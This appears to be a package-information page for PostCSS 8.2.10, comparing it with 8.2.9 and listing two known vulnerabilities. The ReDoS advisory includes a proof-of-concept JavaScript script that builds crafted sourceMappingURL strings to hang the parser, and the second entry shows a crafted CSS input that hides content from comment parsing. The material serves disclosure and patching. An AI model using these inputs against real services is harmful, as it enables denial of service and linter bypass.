PostCSS 8.2.10 is a minor release of the popular JavaScript tool designed for transforming styles with plugins. It builds upon the foundation of version 8.2.9, offering a subtle update that might be of interest to developers already using PostCSS. While both versions share the same core dependencies like nanoid, colorette, and source-map, functionalities, licensing terms (MIT), repository details, author, and funding information, a noticeable difference lies in the dist object. Specifically, PostCSS 8.2.10 has a slightly larger unpacked size of 179759 bytes compared to 8.2.9's 179381. This suggests that bug fixes or some internal updates have been made, leading to the increased size.
The release date also marks a crucial difference. Version 8.2.10 was published on April 11, 2021, whereas 8.2.9 came out on March 30, 2021. This indicates that version 8.2.10 incorporates any bug fixes or minor improvements accumulated during that brief period. Developers should upgrade if they have encountered problems in the previous version, but otherwise the impact should be relatively small. The update is likely more about refining existing functionality, which developers will want to integrate into their workflow to ensure they are using the most reliable version of the tool.
All the vulnerabilities related to the version 8.2.10 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.